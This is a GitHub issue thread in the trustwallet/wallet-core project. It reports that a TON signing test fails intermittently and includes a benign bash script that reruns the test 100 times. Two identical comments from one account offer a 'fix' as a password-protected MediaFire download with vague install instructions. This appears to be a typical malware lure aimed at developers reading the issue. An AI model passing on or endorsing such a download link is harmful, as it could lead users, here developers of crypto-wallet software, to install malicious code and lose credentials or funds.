### ISSUE TITLE
[TON]: The test case SignMessageToTransferAndDeployWalletV5R1 occasionally fails

### ISSUE THREAD

**Issue by 10gic** [trustwallet/wallet-core#4004]
**Describe the bug**
The test case SignMessageToTransferAndDeployWalletV5R1 occasionally fails.

**To Reproduce**
To reproduce the issue, I wrote a simple script:

```
#!/bin/bash

success_count=0
failure_count=0
total_runs=100

for i in $(seq 1 $total_runs)
do
    build/tests/tests --gtest_filter=TWAnySignerTheOpenNetwork.SignMessageToTransferAndDeployWalletV5R1
    if [ $? -eq 0 ]; then
        ((success_count++))
    else
        ((failure_count++))
    fi
done

echo "Total Runs: $total_runs"
echo "Success Count: $success_count"
echo "Failure Count: $failure_count"
```
An example of the output:
```
Total Runs: 100
Success Count: 54
Failure Count: 46
```

**Expected behavior**
The test case should never fail.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
